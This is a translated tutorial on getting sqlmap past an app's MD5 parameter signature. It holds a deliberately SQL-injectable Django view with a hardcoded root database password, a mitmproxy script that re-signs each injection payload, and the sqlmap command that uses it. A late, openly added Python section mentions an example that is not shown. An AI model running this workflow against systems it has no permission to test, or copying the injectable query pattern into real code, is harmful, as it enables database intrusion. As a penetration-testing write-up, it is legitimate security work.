2025-04-10 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Today the editor walks you through sqlmap's approach to dealing with sign encryption. The knowledge points in the article are introduced in detail; readers who find it useful can follow along, and hopefully it helps more people looking for an answer to this problem. Let's follow the editor to learn more about "sqlmap's ideas for dealing with sign encryption".
While testing the company's APP, I found that a fixed 32-character string is appended to the contents of every parameter and the result is MD5-hashed to produce a sign. The APP first verifies whether the sign is correct; if signature verification fails, the request never reaches the database at all. So in order to test it with sqlmap, I wrote a proxy script that intercepts each packet, appends the 32 characters to the parameter contents, re-hashes them, and replaces the sign.
Note: this script is suitable for internal systems, where you know the encryption process, or where you can recover the encryption method from the front-end JS.
First of all, I used Django to write a program that simulates the company's system. The flow is to read the id and token from the POST body and append the custom string. Because the data Django hands you has already been URL-decoded, I use quote to URL-encode the content of the id parameter again, then MD5 it, and finally check whether the token in the request matches the computed value.
views.py:

from django.shortcuts import render
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import hashlib
import MySQLdb
import urllib


# Create your views here.
@csrf_exempt
def index(request):
    id = request.POST.get("id")
    token = request.POST.get("token")
    # Django has already URL-decoded the POST data, so re-encode before hashing
    sign_str = urllib.quote(id + "test")
    print(sign_str)
    hl = hashlib.md5()
    hl.update(sign_str)
    token1 = hl.hexdigest()
    print(token1)
    if token == token1:
        db = MySQLdb.connect("localhost", "root", "123456", "testdb", charset='utf8')
        cursor = db.cursor()
        # deliberately injectable test target: id is concatenated straight into the query
        cursor.execute("select * from t_userinfo where id=" + id)
        data = cursor.fetchone()
        print("Database version: %s" % data)
        db.close()
        return JsonResponse({"msg": "verity ok"})
    else:
        return JsonResponse({"msg": "verity error."})

models.py:

from django.db import models


class userinfo(models.Model):
    name = models.CharField(max_length=100)
    age = models.CharField(max_length=100)
Capturing the request with Burp, you can see the status returned when verification succeeds and when it fails.
When testing with sqlmap directly, the test could not proceed, because every payload breaks the sign.
So I used mitmproxy, an interactive console man-in-the-middle proxy for HTTP and HTTPS (see its documentation for details).
If you need to adapt the script, only the wsproxy_request_handle function has to change, since that is where the request is intercepted and tampered with; the rest is mitmproxy configuration and startup and does not need modifying.
from mitmproxy.proxy.server import ProxyServer
from mitmproxy import flow, proxy, controller, options
import hashlib
import re


def md5cr(raw):
    hl = hashlib.md5()
    hl.update(raw.encode(encoding='utf-8'))
    return hl.hexdigest()


class WSProxy(flow.FlowMaster):
    def __init__(self, opts, server, state, unsave_data):
        super(WSProxy, self).__init__(opts, server, state)
        self.unsave_data = unsave_data

    def run(self):
        try:
            print("start")
            flow.FlowMaster.run(self)
        except KeyboardInterrupt:
            self.shutdown()

    @controller.handler
    def request(self, f):
        wsproxy_request_handle(f)

    @controller.handler
    def response(self, f):
        wsproxy_response_handle(f)
        # parser = ResponseParser(f)
        # insert_result(parser.parser_data())


def wsproxy_request_handle(flow):
    """wsproxy: rewrite the request body before it is sent to the server"""
    try:
        # concatenate the values of every parameter except token
        data = flow.request.content.split("&")
        t = ""
        for i in data:
            if i.split("=")[0] != "token":
                t = t + i.split("=")[1]
        raw = t + "test"
        sign = md5cr(raw)
        print(raw)
        # keep everything up to and including "token=" (token must be the last parameter)
        data1 = re.match("(.*?)token=", flow.request.content).group()
        flow.request.content = data1 + sign
        print(flow.request.content)
    except IndexError:
        pass


def wsproxy_response_handle(flow):
    pass


port = 8888
mode = 'regular'
opts = options.Options(listen_port=int(port), mode=mode, cadir="./ssl/",)
unsave_data = False
config = proxy.ProxyConfig(opts)
state = flow.State()
server = ProxyServer(config)
m = WSProxy(opts, server, state, unsave_data)
m.run()
Run the script above, then point sqlmap at the proxy on http://IP:8888; the script processes each sqlmap payload automatically and generates the corresponding sign.
python sqlmap.py -r e:\1.txt -p id --dbms=mysql --batch --proxy=http://192.168.1.240:8888
The above shows the payload and its sign being generated; the following shows a request whose payload produced an error.
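As an added example (not code from the original article), a Python 3 re-implementation of the signing step as pure functions so it can be checked offline: server_verify mirrors the check in views.py, resign_body does what the mitmproxy handler does but by parsing the form body instead of regex-matching up to "token=", and naive_sign shows why hashing the raw URL-encoded value can disagree with the server's quote() of the decoded value. The suffix "test" is the page's own; the function names and sample bodies are constructed here.

```python
import hashlib
from urllib.parse import parse_qsl, quote, urlencode

SECRET = "test"  # suffix appended by the mock server in views.py


def compute_sign(id_value: str, secret: str = SECRET) -> str:
    """Mirror of the server: md5(quote(id + secret)) over the DECODED id.

    quote() must match the server's flavour exactly (the set of unescaped
    characters differs slightly between Python 2 and 3), or signs diverge.
    """
    return hashlib.md5(quote(id_value + secret).encode("utf-8")).hexdigest()


def naive_sign(raw_encoded_id: str, secret: str = SECRET) -> str:
    """What the mitmproxy script does: hash the still-encoded body value."""
    return hashlib.md5((raw_encoded_id + secret).encode("utf-8")).hexdigest()


def server_verify(body: str, secret: str = SECRET) -> bool:
    """Decode the form body as Django would, recompute, compare with token."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    if "id" not in params or "token" not in params:
        return False
    return compute_sign(params["id"], secret) == params["token"]


def resign_body(body: str, secret: str = SECRET) -> str:
    """Rewrite a form body so its token matches the current id value.

    Parsing the body (rather than regex-matching up to "token=") lets token
    sit anywhere and lets values contain encoded '=' or '&'.
    """
    pairs = parse_qsl(body, keep_blank_values=True)
    id_value = next((v for k, v in pairs if k == "id"), None)
    if id_value is None:
        return body  # nothing to sign; pass the request through untouched
    sign = compute_sign(id_value, secret)
    new_pairs = [(k, sign if k == "token" else v) for k, v in pairs]
    if not any(k == "token" for k, _ in pairs):
        new_pairs.append(("token", sign))
    return urlencode(new_pairs)  # re-encodes values; parse_qsl undoes it server-side
```

The '+'-versus-'%20' case below is where the raw-body approach and the server disagree: the server decodes '+' to a space and re-quotes it as %20, while hashing the raw body sees a literal '+'.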
Thank you for reading. The above is the whole content of "sqlmap's ideas for dealing with sign encryption"; readers who are learning should hurry up and try it out. I believe the editor will bring you more good-quality articles. Thank you for your support of the website!